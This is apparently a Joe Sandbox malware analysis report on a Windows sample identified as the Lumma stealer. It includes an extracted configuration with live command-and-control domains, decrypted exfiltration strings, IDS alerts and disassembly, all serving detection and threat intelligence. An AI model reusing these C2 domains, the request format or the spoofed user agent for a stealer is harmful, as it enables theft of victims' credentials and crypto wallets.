Edit tour

Windows Analysis Report
UhsjR3ZFTD.exe

Overview

General Information

Sample name:	UhsjR3ZFTD.exe renamed because original name is a hash value
Original sample name:	639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620.exe
Analysis ID:	1583096
MD5:	51648584ffb4a6398eb1cef4da20e457
SHA1:	74f2facfc001a0b4f23b8d4ce24208aa0c5f84e2
SHA256:	639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620
Tags:	exeuser-Chainskilabs
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

UhsjR3ZFTD.exe (PID: 5484 cmdline: "C:\Users\user\Desktop\UhsjR3ZFTD.exe" MD5: 51648584FFB4A6398EB1CEF4DA20E457)

conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

UhsjR3ZFTD.exe (PID: 3960 cmdline: "C:\Users\user\Desktop\UhsjR3ZFTD.exe" MD5: 51648584FFB4A6398EB1CEF4DA20E457)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "noisycuttej.shop", "nearycrepso.shop", "tirepublicerj.shop", "wholersorie.shop", "framekgirus.shop", "fancywaxxers.shop", "rabidcowse.shop"], "Build id": "Zv86PG--UzeRR"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2181607562.0000000002E95000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2181670779.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UhsjR3ZFTD.exe PID: 3960	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: UhsjR3ZFTD.exe PID: 3960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UhsjR3ZFTD.exe PID: 3960	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T22:04:57.607657+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	104.21.32.1	443	TCP
2025-01-01T22:04:58.679432+0100	2028371	3	Unknown Traffic	192.168.2.6	49713	104.21.32.1	443	TCP
2025-01-01T22:04:59.945904+0100	2028371	3	Unknown Traffic	192.168.2.6	49714	104.21.32.1	443	TCP
2025-01-01T22:05:01.080623+0100	2028371	3	Unknown Traffic	192.168.2.6	49715	104.21.32.1	443	TCP
2025-01-01T22:05:02.222016+0100	2028371	3	Unknown Traffic	192.168.2.6	49717	104.21.32.1	443	TCP
2025-01-01T22:05:04.498341+0100	2028371	3	Unknown Traffic	192.168.2.6	49718	104.21.32.1	443	TCP
2025-01-01T22:05:05.841345+0100	2028371	3	Unknown Traffic	192.168.2.6	49720	104.21.32.1	443	TCP
2025-01-01T22:05:08.033859+0100	2028371	3	Unknown Traffic	192.168.2.6	49736	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T22:04:58.143694+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49712	104.21.32.1	443	TCP
2025-01-01T22:04:59.155272+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49713	104.21.32.1	443	TCP
2025-01-01T22:05:08.503939+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49736	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T22:04:58.143694+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49712	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T22:04:59.155272+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49713	104.21.32.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T22:04:57.607657+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49712	104.21.32.1	443	TCP
2025-01-01T22:04:58.679432+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49713	104.21.32.1	443	TCP
2025-01-01T22:04:59.945904+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49714	104.21.32.1	443	TCP
2025-01-01T22:05:01.080623+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49715	104.21.32.1	443	TCP
2025-01-01T22:05:02.222016+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49717	104.21.32.1	443	TCP
2025-01-01T22:05:04.498341+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49718	104.21.32.1	443	TCP
2025-01-01T22:05:05.841345+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49720	104.21.32.1	443	TCP
2025-01-01T22:05:08.033859+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49736	104.21.32.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T22:04:57.123034+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.6	64545	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T22:05:04.933530+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49718	104.21.32.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/apid	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiM	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/apixt.default-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/apil	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiE	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/apitPK	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/9	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "noisycuttej.shop", "nearycrepso.shop", "tirepublicerj.shop", "wholersorie.shop", "framekgirus.shop", "fancywaxxers.shop", "rabidcowse.shop"], "Build id": "Zv86PG--UzeRR"}

Multi AV Scanner detection for submitted file

Source: UhsjR3ZFTD.exe

ReversingLabs: Detection: 31%

Machine Learning detection for sample

Source: UhsjR3ZFTD.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Zv86PG--UzeRR

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 3_2_00419362 CryptUnprotectData,

3_2_00419362

Source: UhsjR3ZFTD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006DB358 FindFirstFileExW,	0_2_006DB358
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_006DB409
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006DB358 FindFirstFileExW,	3_2_006DB358
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_006DB409

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]	3_2_00426000
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]	3_2_0040C22D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov dword ptr [esp], ecx	3_2_00419362
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	3_2_0043FB80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]	3_2_0043DCE9
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_0043DCE9
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	3_2_00440480
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov esi, edx	3_2_00408640
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042BE8A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	3_2_0042BE8A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	3_2_0042A050
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]	3_2_0043E051
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]	3_2_0043E850
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then jmp ecx	3_2_0043D818
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h	3_2_00419820
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00419820
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	3_2_0043F830
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	3_2_0043F0CB
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [edi], dl	3_2_0042C0CD
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	3_2_00415882
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	3_2_00415882
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h	3_2_004398A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh	3_2_004390A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [edi], dl	3_2_0042C140
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh	3_2_00416148
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]	3_2_00416148
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_00416148
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_00416148
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [edi], cx	3_2_0042895A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov ecx, eax	3_2_0042895A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx esi, word ptr [eax]	3_2_00424974
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00424974
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00428100
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	3_2_00440130
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then jmp ecx	3_2_004229CD
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004229CD
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_0043E19A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [edi], dl	3_2_0042C1A3
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]	3_2_0043C1B0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	3_2_0043F1B0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00427A5A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [edi], ax	3_2_0041CA60
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [edi], ax	3_2_0041CA60
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]	3_2_0043E262
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]	3_2_00423A60
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042C26C
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	3_2_0042C26C
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0042BA79
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	3_2_0043F2F6
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042C282
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	3_2_0042C282
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]	3_2_0043EA80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00429A90
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00426340
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]	3_2_00426340
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_00402B60
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]	3_2_00426360
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00426360
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00427B08
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	3_2_0043F330
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]	3_2_004073C0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	3_2_004073C0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	3_2_0043F3C0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]	3_2_0041C3CC
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then push esi	3_2_00420BD3
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then test eax, eax	3_2_004393D0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [eax], dl	3_2_0042238D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then jmp ecx	3_2_0042238D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov edx, eax	3_2_0043C440
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	3_2_0043F450
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]	3_2_00439C70
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00435410
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	3_2_00421C80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	3_2_00416C90
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	3_2_004274A5
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]	3_2_00427CB0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00427CB0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov esi, ecx	3_2_0043C510
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then test eax, eax	3_2_0043C510
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	3_2_0043C510
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]	3_2_00414DC0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	3_2_00416C90
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	3_2_004155DB
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov ecx, eax	3_2_0041AD80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h	3_2_0043FE20
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [ecx], bp	3_2_0041CECA
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx]	3_2_0043E6E0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]	3_2_0040C6F0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_00408EF0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	3_2_0041DE90
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [ebx], cx	3_2_00418740
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [edi], dx	3_2_00414777
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041BFCA
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	3_2_004237D0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]	3_2_00417FE1
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]	3_2_00417FE1
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_00416F8D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov edx, ecx	3_2_00416F8D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_00416F8D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	3_2_00424F91
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00424F91
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	3_2_0043DFB3

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.6:64545 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49718 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49713 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49714 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49712 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49717 -> 104.21.32.1:443
